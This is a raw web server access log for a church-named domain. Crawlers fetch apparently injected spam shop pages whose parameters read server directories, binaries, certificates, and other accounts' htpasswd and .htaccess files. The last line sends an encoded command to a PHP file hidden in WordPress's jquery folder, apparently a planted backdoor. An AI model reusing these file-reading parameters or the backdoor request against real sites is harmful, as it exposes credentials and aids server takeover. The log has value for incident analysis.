66.249.82.0 - - [13/Mar/2026:00:14:39 -0400] "GET /.well-known/traffic-advice HTTP/1.1" 200 54919 baptist-temple.com "-" "Chrome Privacy Preserving Prefetch Proxy" "-"
2001:4860:: - - [13/Mar/2026:00:14:39 -0400] "GET /shop/polypod/artlessness11338417014.html HTTP/1.1" 200 854 baptist-temple.com "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36" "-"
74.7.242.0 - - [13/Mar/2026:00:14:39 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/tty/driver HTTP/1.1" 200 12685 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/tty" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
51.161.65.0 - - [13/Mar/2026:00:14:39 -0400] "GET /shop/teend/ideogram152889621145.html HTTP/1.1" 200 54919 www.baptist-temple.com "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:39 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/x86_64-linux-gnu/libnsl-2.31.so&path=//lib/x86_64-linux-gnu HTTP/1.1" 200 12271 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:14:40 -0400] "GET /shop/dyspnoea/saccharometer144056044746.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:40 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/ssl/certs/ecccd8db.0&path=//lib/ssl/certs HTTP/1.1" 200 13143 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:40 -0400] "GET /shop/freemasonic/decently132819655215.html HTTP/1.1" 200 215603 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:40 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/info&path=//kunden/usr/bin HTTP/1.1" 200 12279 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:41 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/lib/python3.9/asyncio/base_events.py&path=//kunden/lib/python3.9/asyncio HTTP/1.1" 200 88189 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:41 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/x86_64-linux-gnu/libmpfr.so.6&path=//lib/x86_64-linux-gnu HTTP/1.1" 200 12269 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:42 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/pear7.0&path=//kunden/usr/bin HTTP/1.1" 200 13257 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:42 -0400] "GET /shop/commemorative/giambeux133045116214.html HTTP/1.1" 200 215489 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
74.7.242.0 - - [13/Mar/2026:00:14:42 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/irq/50 HTTP/1.1" 200 21135 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/irq" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:42 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/python3.9/ctypes/__pycache__/_aix.cpython-39.pyc&path=//lib/python3.9/ctypes/__pycache__ HTTP/1.1" 200 12391 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:43 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=/homepages/22/d367468629/htpasswd&path=/homepages/22/d367468629 HTTP/1.1" 200 12311 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:14:43 -0400] "GET /shop/eosaurus/chilomycterus143754454121.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:44 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=/homepages/22/d367468629/last_traffic&path=/homepages/22/d367468629 HTTP/1.1" 200 12315 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:44 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/ssl/certs/ca6e4ad9.0&path=//lib/ssl/certs HTTP/1.1" 200 14309 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:45 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/lib/python3.9/codeop.py&path=//kunden/lib/python3.9 HTTP/1.1" 200 19016 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:45 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/pnmtoxwd&path=//bin HTTP/1.1" 200 12188 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:45 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/tty&path=//bin HTTP/1.1" 200 12183 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:14:45 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/sys/mars HTTP/1.1" 200 143027 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:46 -0400] "GET /shop/normally/antichthon111815721302.html HTTP/1.1" 200 210706 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:46 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/ssl/certs/SSL.com_Root_Certification_Authority_ECC.pem&path=//lib/ssl/certs HTTP/1.1" 200 13254 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:46 -0400] "GET /shop/hieromnemon/derring133608437275.html HTTP/1.1" 200 211409 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:47 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/x86_64-linux-gnu/perl/5.32/lib.pm&path=//lib/x86_64-linux-gnu/perl/5.32 HTTP/1.1" 200 18690 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:47 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/lksh&path=//kunden/usr/bin HTTP/1.1" 200 12279 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:48 -0400] "GET /shop/restorator/uncharitable101607981812.html?path=//lib HTTP/1.1" 200 93632 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:14:48 -0400] "GET /shop/episcopicide/gnomonics142287348319.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:48 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/git-core/git-credential-cache--daemon&path=//lib/git-core HTTP/1.1" 200 12261 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:48 -0400] "GET /shop/misconclusion/icily132574788858.html HTTP/1.1" 200 218681 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:48 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/python3.9/asynchat.py&path=//lib/python3.9 HTTP/1.1" 200 23823 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:14:49 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/ipmi/0 HTTP/1.1" 200 21082 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/ipmi" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:49 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/x86_64-linux-gnu-gcov-tool-10&path=//kunden/usr/bin HTTP/1.1" 200 12304 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:49 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=/homepages/22/d367468629/lastmovespace&path=/homepages/22/d367468629 HTTP/1.1" 200 12316 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:50 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/python3&path=//bin HTTP/1.1" 200 12187 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:50 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/gemtopnm&path=//kunden/usr/bin HTTP/1.1" 200 12283 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:51 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/run-parts&path=//bin HTTP/1.1" 200 12189 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:14:51 -0400] "GET /shop/euphemia/importunately141919140151.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:51 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/ssl/certs/Entrust.net_Premium_2048_Secure_Server_CA.pem&path=//lib/ssl/certs HTTP/1.1" 200 13816 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:14:52 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/sys/abi HTTP/1.1" 200 14101 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:52 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/lib/python3.9/bdb.py&path=//kunden/lib/python3.9 HTTP/1.1" 200 45429 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:52 -0400] "GET /shop/hemato/backgammon131638802902.html HTTP/1.1" 200 217683 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:52 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=/homepages/42/d414105715/last_traffic&path=/homepages/42/d414105715 HTTP/1.1" 200 12315 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:53 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/lib/git-core/git-cherry-pick&path=//kunden/lib/git-core HTTP/1.1" 200 12305 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:54 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/pbmtopsg3&path=//kunden/usr/bin HTTP/1.1" 200 12284 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:54 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/lib/python3.9/asyncio/log.py&path=//kunden/lib/python3.9/asyncio HTTP/1.1" 200 12520 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:55 -0400] "GET /shop/enamored/xanthrochroic131014465983.html HTTP/1.1" 200 223483 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:55 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/python3.9/http/cookiejar.py&path=//lib/python3.9/http HTTP/1.1" 200 95478 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:14:55 -0400] "GET /shop/euphrasia/overpraising142473492757.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:14:55 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/sys/fs HTTP/1.1" 200 84067 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:55 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/python3.9/_py_abc.py&path=//lib/python3.9 HTTP/1.1" 200 18778 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:56 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/git-core/git-upload-pack&path=//lib/git-core HTTP/1.1" 200 12248 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:56 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/ex&path=//bin HTTP/1.1" 200 12182 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:57 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/lib/python3.9/multiprocessing/connection.py&path=//kunden/lib/python3.9/multiprocessing HTTP/1.1" 200 44790 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:57 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/ssl/certs/2923b3f9.0&path=//lib/ssl/certs HTTP/1.1" 200 13578 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:57 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/mariadb-dumpslow&path=//kunden/usr/bin HTTP/1.1" 200 20913 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:58 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/lib/python3.9/lib-dynload/_ssl.cpython-39-x86_64-linux-gnu.so&path=//kunden/lib/python3.9/lib-dynload HTTP/1.1" 200 12407 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:14:58 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/sys/vm HTTP/1.1" 200 95355 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:58 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/lib/python3.9/multiprocessing/heap.py&path=//kunden/lib/python3.9/multiprocessing HTTP/1.1" 200 24155 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:58 -0400] "GET /shop/shough/hawaiian134004109917.html HTTP/1.1" 200 229612 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
144.76.32.0 - - [13/Mar/2026:00:14:58 -0400] "GET /shop/examinator/imputability14186104124.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:59 -0400] "GET /shop/restorator/uncharitable101607981812.html?fileloc=/homepages/25/d507814345/DASTOOLSTART&path=/homepages/25/d507814345 HTTP/1.1" 200 12315 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:59 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/pbmtopi3&path=//bin HTTP/1.1" 200 12188 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:15:00 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/tpage&path=//bin HTTP/1.1" 200 21500 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:15:01 -0400] "GET /shop/lingerer/rubbish133985963903.html HTTP/1.1" 200 215464 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:15:01 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/gpgv&path=//bin HTTP/1.1" 200 12184 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:15:01 -0400] "GET /shop/fallible/lookover162641977811.html?path=//var/cache HTTP/1.1" 200 20573 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:15:01 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/irq/48 HTTP/1.1" 200 21135 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/irq" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:15:02 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/python3.9/test/libregrtest/main.py&path=//lib/python3.9/test/libregrtest HTTP/1.1" 200 37797 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:15:02 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=/homepages/14/d292149100/.htaccess&path=/homepages/14/d292149100 HTTP/1.1" 200 12312 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:15:02 -0400] "GET /shop/exceptant/afflictedness14271804180.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
74.208.59.0 - - [13/Mar/2026:00:11:54 -0400] "GET /wp-includes/js/jquery/jquery/index.php?ARRAY=7o2230223n313737333337383731342p2231223n22687474703n5p2s5p2s7n733738307631336o6s2r73616r6369626p652r6963755p2s3s6p633q7068705s636s64655s6n6326743q313737333337353131342q3761633263623563356165316631373731623434396161643961636432363466222p2232223n223638396333653234623431623239353061386638383366356265343839393866222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q33332q35372q36372q37342q38332q3232227q HTTP/1.1" 200 52 www.baptist-temple.com "-" "-" "-"
